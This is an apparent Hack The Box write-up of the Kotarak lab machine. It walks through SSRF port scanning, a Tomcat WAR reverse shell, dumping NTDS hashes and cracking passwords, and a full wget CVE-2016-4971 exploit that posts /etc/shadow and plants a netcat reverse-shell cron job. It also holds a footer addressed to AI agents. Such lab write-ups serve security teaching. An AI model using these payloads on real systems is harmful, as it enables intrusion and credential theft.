# Kotarak

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FVysA7NT4xXZO5f2mNkVu%2Fkotarak.png?alt=media&#x26;token=880ad448-cff6-4b2f-ac30-7b849bcf79df" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.55 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Tue Nov  8 16:16:16 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.55
Nmap scan report for 10.10.10.55
Host is up (0.066s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
8009/tcp  open  ajp13
8080/tcp  open  http-proxy
60000/tcp open  unknown

# Nmap done at Tue Nov  8 16:16:30 2022 -- 1 IP address (1 host up) scanned in 13.95 seconds
```

{% endcode %}

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p22,8009,8080,60000 10.10.10.55 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Tue Nov  8 16:18:13 2022 as: nmap -sCV -p22,8009,8080,60000 -oN targeted 10.10.10.55
Nmap scan report for 10.10.10.55
Host is up (0.042s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2d7ca0eb7cb0a51f72e75ea02241774 (RSA)
|   256 e8f1c0d37d9b4373ad373bcbe1648ee9 (ECDSA)
|_  256 6de926ad86022d68e1ebad66a06017b8 (ED25519)
8009/tcp  open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp  open  http    Apache Tomcat 8.5.5
|_http-title: Apache Tomcat/8.5.5 - Error report
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-favicon: Apache Tomcat
60000/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title:         Kotarak Web Hosting        
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov  8 16:19:22 2022 -- 1 IP address (1 host up) scanned in 68.82 seconds
```

{% endcode %}

Website in port *8080* shows an *Apache Tomcat* application.

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Flb6FJzYoTiiQ541n3N1U%2Fimage.png?alt=media&#x26;token=5a9d3767-5a21-4f31-9562-4914f0e81ab6" alt=""><figcaption></figcaption></figure>

But we don't have credentials for the `/manager/html` administration panel.

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FaqpCO3rxGemhXaHGeAZb%2Fimage.png?alt=media&#x26;token=a11ba82f-47b9-4148-b508-640373e457e0" alt=""><figcaption></figcaption></figure>

The website on port *60000* shows a private web browser. But none of the left buttons work.

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FqdGQgg8xGMC5smgDVHcp%2Fimage.png?alt=media&#x26;token=90c1bc07-77e2-4d78-a3a4-f4e50259fd88" alt=""><figcaption></figcaption></figure>

If we search anything random, we'll be redirected to the following URL.

> <http://10.10.10.55:60000/url.php?path=test>

We could try to search web services such us the *Apache Tomcat* available on port *8080*.

> <http://10.10.10.55:60000/url.php?path=localhost:8080>

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Flb6FJzYoTiiQ541n3N1U%2Fimage.png?alt=media&#x26;token=5a9d3767-5a21-4f31-9562-4914f0e81ab6" alt=""><figcaption></figcaption></figure>

## Exploitation

And it loads! This means that we could try to exploit an SSRF attack.

{% hint style="info" %}
**Server Side Request Forgery (SSRF)** is a type of exploitation in which an attacker abuses the functionality of a server and causes it to access or manipulate information within the scope of that server that would not otherwise be directly accessible to the attacker.
{% endhint %}

I wrote the following script in bash which will try to access `localhost:$port`, and check if the port is open.

```bash
#!/bin/bash

function check_port(){
	r=$(curl -s "http://10.10.10.55:60000/url.php?path=localhost:"$port)
	length=$(echo $r | wc -c)

	if [[ length -ne 1 ]];then
		echo $port
	fi
}

for port in $(seq 1 65535); do
	check_port &
done
```

If we run the exploit, we'll see that now we can access more ports, such as ports *22, 90, 110, 200, 320, 888, 3306, 8080* or *60000*.

> bash exploit.sh

```
22
90
110
200
320
888
3306
8080
60000
```

The only new interesting port seems to be port *888*.

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FS7mWgq29HEJ9TpDvluPb%2Fimage.png?alt=media&#x26;token=4f0df5aa-dcaa-4934-9557-fd2c5369b7ad" alt=""><figcaption></figcaption></figure>

If we take a look at the `backup` file we won't see anything.

> <http://10.10.10.55:60000/url.php?path=localhost:888/?doc=backup>

But, if we check its source code, we'll see the common configuration file for *Tomcat*, with some credentials.

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FtSNYLX1EaJYXiHEJ4kbX%2Fimage.png?alt=media&#x26;token=12728ae8-ec07-4a19-80a9-594f2839d79e" alt=""><figcaption></figcaption></figure>

Trying those credentials in the `/manager/html` login popup will give us access to the *Tomcat* manager.

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fk9vFX7zWdnEXaHN6OeSt%2Fimage.png?alt=media&#x26;token=4e5bb5d6-1cc3-412d-b8e8-bcec78b1eb5b" alt=""><figcaption></figcaption></figure>

Now, we are able to see the *Tomcat Web Application Manager*.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FoBEOxxJzrnGqf5vcHlFD%2Fimage.png?alt=media\&token=3823e21d-f9ea-4118-aab7-ca5000e3e6c6)

Time to get a shell. If we check out the web page, we could see there is a *Deploy* section in which we can upload *WAR* files.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fdlzf6mXjAkp3iYyUe9uu%2FCaptura%20de%20pantalla%202022-01-17%20142706.png?alt=media\&token=209daada-eb79-43bf-b7e6-6b1f7e3a9312)

{% hint style="info" %}
The following link explains what *WAR* files are:

<http://java.boot.by/wcd-guide/ch02s04.html>
{% endhint %}

At this point, the idea is to create a *WAR* payload with msfvenom, upload it to the web page, and get a reverse shell.

> msfvenom -p java/jsp\_shell\_reverse\_tcp lhost=10.10.14.15 lport=4444 -f war -o reverse\_shell.war

* `-p` indicates the type of **payload**.
* `lhost` local **host** IP.
* `lport` local **port** of the listener.
* `-f` output **format**.
* `-o` save the output to a **file**.

All we have to do is upload the payload and hit *Deploy*.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FCtPS7WxZvbnlvBStuOdO%2FCaptura%20de%20pantalla%202022-01-17%20145213.png?alt=media\&token=35759642-6aae-477a-acde-85ac8a948520)

Under the *Application* section, a new row should appear with the path of our uploaded payload.

![](https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fbja5h3acknEnJYtxuIqK%2FCaptura%20de%20pantalla%202022-01-17%20145545.png?alt=media\&token=44c5ca4b-21e1-4920-b37d-7c55e7bb0ef1)

Finally, all we have to do is set a netcat listener on port 4444 and hit the */reverse\_shell* path.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

```
Listening on 0.0.0.0 4444
Connection received on 10.10.10.55 41688
whoami
tomcat
```

## Privilege Escalation

First, let's set an interactive *TTY* shell.

> python -c 'import pty;pty.spawn("/bin/bash")'

Then I press `Ctrl+Z` and execute the following command on my local machine:

> stty raw -echo; fg
>
> reset
>
> Terminal type? xterm

Next, I export a few variables:

> export TERM=xterm
>
> export SHELL=bash

Finally, I run the following command in our local machine:

> stty size

```
51 236
```

And set the proper dimensions in the victim machine:

> stty rows 51 columns 236

As the flag is under the `/home/atanas` directory, we will have to become the `atanas` user.

> find / -name user.txt 2>/dev/null

```
/home/atanas/user.txt
```

Inside the `/home/tomcat` directory, there is another one called `to_archive`, with another one inside called `pentest_data`, with a few files inside.

> ls -l /home/tomcat/to\_archive/pentest\_data

```
total 28304
-rw-r--r-- 1 tomcat tomcat 16793600 Jul 21  2017 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit
-rw-r--r-- 1 tomcat tomcat 12189696 Jul 21  2017 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
```

These files seem to be an extract of the *Windows NTDS* database. Let's transfer those to our machine.

> python -m SimpleHTTPServer 1234

On our local machine.

> wget <http://10.10.10.55:1234/20170721114636\\_default\\_192.168.110.133\\_psexec.ntdsgrab.\\_333512.dit> -O ntds.dit
>
> wget <http://10.10.10.55:1234/20170721114637\\_default\\_192.168.110.133\\_psexec.ntdsgrab.\\_089134.bin> -O ntds.bin&#x20;

Now, we can extract the *NTLM* hashes with the *secretsdump* tool from *impacket*.

> impacket-secretsdump -ntds ntds.dit -system ntds.bin LOCAL

```
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x14b6fb98fedc8e15107867c4722d1399
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: d77ec2af971436bccb3b6fc4a969d7ff
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:6c53b16d11a496d0535959885ea7c79c04945889028704e2a4d1ca171e4374e2
Administrator:aes128-cts-hmac-sha1-96:e2a25474aa9eb0e1525d0f50233c0274
Administrator:des-cbc-md5:75375eda54757c2f
WIN-3G2B0H151AC$:aes256-cts-hmac-sha1-96:84e3d886fe1a81ed415d36f438c036715fd8c9e67edbd866519a2358f9897233
WIN-3G2B0H151AC$:aes128-cts-hmac-sha1-96:e1a487ca8937b21268e8b3c41c0e4a74
WIN-3G2B0H151AC$:des-cbc-md5:b39dc12a920457d5
WIN-3G2B0H151AC$:rc4_hmac:668d49ebfdb70aeee8bcaeac9e3e66fd
krbtgt:aes256-cts-hmac-sha1-96:14134e1da577c7162acb1e01ea750a9da9b9b717f78d7ca6a5c95febe09b35b8
krbtgt:aes128-cts-hmac-sha1-96:8b96c9c8ea354109b951bfa3f3aa4593
krbtgt:des-cbc-md5:10ef08047a862046
krbtgt:rc4_hmac:ca1ccefcb525db49828fbb9d68298eee
WIN2K8$:aes256-cts-hmac-sha1-96:289dd4c7e01818f179a977fd1e35c0d34b22456b1c8f844f34d11b63168637c5
WIN2K8$:aes128-cts-hmac-sha1-96:deb0ee067658c075ea7eaef27a605908
WIN2K8$:des-cbc-md5:d352a8d3a7a7380b
WIN2K8$:rc4_hmac:160f6c1db2ce0994c19c46a349611487
WINXP1$:aes256-cts-hmac-sha1-96:347a128a1f9a71de4c52b09d94ad374ac173bd644c20d5e76f31b85e43376d14
WINXP1$:aes128-cts-hmac-sha1-96:0e4c937f9f35576756a6001b0af04ded
WINXP1$:des-cbc-md5:984a40d5f4a815f2
WINXP1$:rc4_hmac:6f5e87fd20d1d8753896f6c9cb316279
WIN2K31$:aes256-cts-hmac-sha1-96:f486b86bda928707e327faf7c752cba5bd1fcb42c3483c404be0424f6a5c9f16
WIN2K31$:aes128-cts-hmac-sha1-96:1aae3545508cfda2725c8f9832a1a734
WIN2K31$:des-cbc-md5:4cbf2ad3c4f75b01
WIN2K31$:rc4_hmac:cdd7a7f43d06b3a91705900a592f3772
WIN7$:aes256-cts-hmac-sha1-96:b9921a50152944b5849c706b584f108f9b93127f259b179afc207d2b46de6f42
WIN7$:aes128-cts-hmac-sha1-96:40207f6ef31d6f50065d2f2ddb61a9e7
WIN7$:des-cbc-md5:89a1673723ad9180
WIN7$:rc4_hmac:24473180acbcc5f7d2731abe05cfa88c
atanas:aes256-cts-hmac-sha1-96:933a05beca1abd1a1a47d70b23122c55de2fedfc855d94d543152239dd840ce2
atanas:aes128-cts-hmac-sha1-96:d1db0c62335c9ae2508ee1d23d6efca4
atanas:des-cbc-md5:6b80e391f113542a
[*] Cleaning up...
```

I tried to search those *NTLM* hashes in rainbow tables such as *crackstation*, and there were two hashes with the passwords `f16tomcat!` and `Password123!`.

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FQ4ndaHweUdhI7dhz0pFQ%2Fimage.png?alt=media&#x26;token=2eea6359-28b2-4227-a965-fc9c22970f4d" alt=""><figcaption></figcaption></figure>

Now, we can log in as `atanas` using the `f16tomcat!` password. Then, we'll be able to grab the user flag.

> su atanas

```
Password: f16tomcat!
atanas@kotarak-dmz:/home/tomcat/to_archive/pentest_data$ whoami
atanas
atanas@kotarak-dmz:/home/tomcat/to_archive/pentest_data$ cat /home/atanas/user.txt 
93f844f50491ef797c9c1b601b4bece8
```

It looks like we can see the content of the /root directory, which has two files.

> ls -l /root

```
total 8
-rw------- 1 atanas root 333 Jul 20  2017 app.log
-rw------- 1 atanas root  66 Aug 29  2017 flag.txt
```

The `flag.txt` file is not the root flag we are looking for.

> cat flag.txt

```
Getting closer! But what you are looking for can't be found here.
```

If we check the network interfaces, we'll see that there is one called `lxbr0` which seems to be from a container.

> ifconfig

```
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:a0:0e  
          inet addr:10.10.10.55  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:a00e/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:a00e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:35551 errors:0 dropped:0 overruns:0 frame:0
          TX packets:73777 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2387519 (2.3 MB)  TX bytes:104203150 (104.2 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:9196 errors:0 dropped:0 overruns:0 frame:0
          TX packets:9196 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:680692 (680.6 KB)  TX bytes:680692 (680.6 KB)

lxcbr0    Link encap:Ethernet  HWaddr 00:16:3e:00:00:00  
          inet addr:10.0.3.1  Bcast:0.0.0.0  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe00:0/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:54 errors:0 dropped:0 overruns:0 frame:0
          TX packets:53 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3172 (3.1 KB)  TX bytes:3580 (3.5 KB)

lxdbr0    Link encap:Ethernet  HWaddr 0e:d4:c4:ce:f4:09  
          inet6 addr: fe80::cd4:c4ff:fece:f409/64 Scope:Link
          inet6 addr: fe80::1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:470 (470.0 B)

veth0MB0V7 Link encap:Ethernet  HWaddr fe:bb:d2:96:48:b9  
          inet6 addr: fe80::fcbb:d2ff:fe96:48b9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:54 errors:0 dropped:0 overruns:0 frame:0
          TX packets:61 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3928 (3.9 KB)  TX bytes:4228 (4.2 KB)
```

And the app.log file contains logs from the machine `10.0.3.133` trying to download with `Wget/1.16` a file called `archive.tar.gz`.

> cat app.log

```
10.0.3.133 - - [20/Jul/2017:22:48:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:50:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
10.0.3.133 - - [20/Jul/2017:22:52:01 -0400] "GET /archive.tar.gz HTTP/1.1" 404 503 "-" "Wget/1.16 (linux-gnu)"
```

The machine seems to be active.

> ping -c 1 10.0.3.133

```
PING 10.0.3.133 (10.0.3.133) 56(84) bytes of data.
64 bytes from 10.0.3.133: icmp_seq=1 ttl=64 time=0.075 ms

--- 10.0.3.133 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.075/0.075/0.075/0.000 ms
```

If we try to set a simple *HTTP* server with python on port *80*, we will get a permission denied error.

> python -m SimpleHTTPServer 80

```
...
socket.error: [Errno 13] Permission denied
```

But, *authbind* is available on the machine, and we are able to listen on port *21*, and *80.*

> ls -l /etc/authbind/byport/

```
total 0
-rwxr-xr-x 1 root atanas 0 Aug 29  2017 21
-rwxr-xr-x 1 root atanas 0 Aug 29  2017 80
```

We can listen on port 80 with authbind. And there seems to be a cron job running the *wget* command.

> authbind nc -lvnp 80

```
Listening on [0.0.0.0] (family 0, port 80)
Connection from [10.0.3.133] port 80 [tcp/*] accepted (family 2, sport 37666)
GET /archive.tar.gz HTTP/1.1
User-Agent: Wget/1.16 (linux-gnu)
Accept: */*
Host: 10.0.3.1
Connection: Keep-Alive
```

Note that the version of *wget* is *1.16*, which is vulnerable to a *Remote Command Execution* [exploit](https://www.exploit-db.com/exploits/40064). To get access to the container, first create the directory `/tmp/ftptest` and access it.

> mkdir /tmp/ftptest
>
> cd /tmp/ftptest

Then, create the file `.wgetrc` with the following content.

> cat <<\_EOF\_>.wgetrc
>
> post\_file = /etc/shadow
>
> output\_document = /etc/cron.d/wget-root-shell
>
> \_EOF\_

Now, create the `wget-exploit.py` script with the following content.

```python
#!/usr/bin/env python

#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid( at )legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971 
#

import SimpleHTTPServer
import SocketServer
import socket;

class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        # This takes care of sending .wgetrc

        print "We have a volunteer requesting " + self.path + " by GET :)\n"
        if "Wget" not in self.headers.getheader('User-Agent'):
            print "But it's not a Wget :( \n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return

        print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
        self.send_response(301)
        new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
        print "Sending redirect to %s \n"%(new_path)
        self.send_header('Location', new_path)
        self.end_headers()

    def do_POST(self):
        # In here we will receive extracted file and install a PoC cronjob

        print "We have a volunteer requesting " + self.path + " by POST :)\n"
        if "Wget" not in self.headers.getheader('User-Agent'):
            print "But it's not a Wget :( \n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return

        content_len = int(self.headers.getheader('content-length', 0))
        post_body = self.rfile.read(content_len)
        print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)

        print "Sending back a cronjob script as a thank-you for the file..." 
        print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(ROOT_CRON)

        print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"

        return

HTTP_LISTEN_IP = '0.0.0.0'
HTTP_LISTEN_PORT = 80
FTP_HOST = '10.10.10.55'
FTP_PORT = 21

ROOT_CRON = "* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 5555 >/tmp/f \n"

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "Ready? Is your FTP server running?"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
    print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
    print "FTP is down :( Exiting."
    exit(1)

print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT

handler.serve_forever()

```

Now, start an FTP server with python in the background.

> authbind python -m pyftpdlib -p21 -w &

Set a *netcat* listener on port *5555* on our local machine.

> nc -lvnp 5555

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Then, run the `wget-exploit.py` script on the victim machine.

> authbind python wget-exploit.py

```
Ready? Is your FTP server running?
FTP found open on 10.10.10.55:21. Let's go then

Serving wget exploit on port 80...


We have a volunteer requesting /archive.tar.gz by GET :)

Uploading .wgetrc via ftp redirect vuln. It should land in /root 

10.0.3.133 - - [09/Nov/2022 11:08:01] "GET /archive.tar.gz HTTP/1.1" 301 -
Sending redirect to ftp://anonymous@10.10.10.55:21/.wgetrc 

We have a volunteer requesting /archive.tar.gz by POST :)

Received POST from wget, this should be the extracted /etc/shadow file: 

---[begin]---
 root:*:17366:0:99999:7:::
daemon:*:17366:0:99999:7:::
bin:*:17366:0:99999:7:::
sys:*:17366:0:99999:7:::
sync:*:17366:0:99999:7:::
games:*:17366:0:99999:7:::
man:*:17366:0:99999:7:::
lp:*:17366:0:99999:7:::
mail:*:17366:0:99999:7:::
news:*:17366:0:99999:7:::
uucp:*:17366:0:99999:7:::
proxy:*:17366:0:99999:7:::
www-data:*:17366:0:99999:7:::
backup:*:17366:0:99999:7:::
list:*:17366:0:99999:7:::
irc:*:17366:0:99999:7:::
gnats:*:17366:0:99999:7:::
nobody:*:17366:0:99999:7:::
systemd-timesync:*:17366:0:99999:7:::
systemd-network:*:17366:0:99999:7:::
systemd-resolve:*:17366:0:99999:7:::
systemd-bus-proxy:*:17366:0:99999:7:::
syslog:*:17366:0:99999:7:::
_apt:*:17366:0:99999:7:::
sshd:*:17366:0:99999:7:::
ubuntu:$6$edpgQgfs$CcJqGkt.zKOsMx1LCTCvqXyHCzvyCy1nsEg9pq1.dCUizK/98r4bNtLueQr4ivipOiNlcpX26EqBTVD2o8w4h0:17368:0:99999:7:::
 
---[eof]---


Sending back a cronjob script as a thank-you for the file...
It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)
10.0.3.133 - - [09/Nov/2022 11:10:01] "POST /archive.tar.gz HTTP/1.1" 200 -

File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :)
```

Now, we'll have to wait for a minute until the cron job gets executed, and then we'll get a reverse shell as root in the container machine. Then, all we have to do is reap the harvest and take the root flag.

```
Listening on 0.0.0.0 5555
Connection received on 10.10.10.55 56798
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
950d1425795dfd38272c93ccbb63ae2c
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/kotarak.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.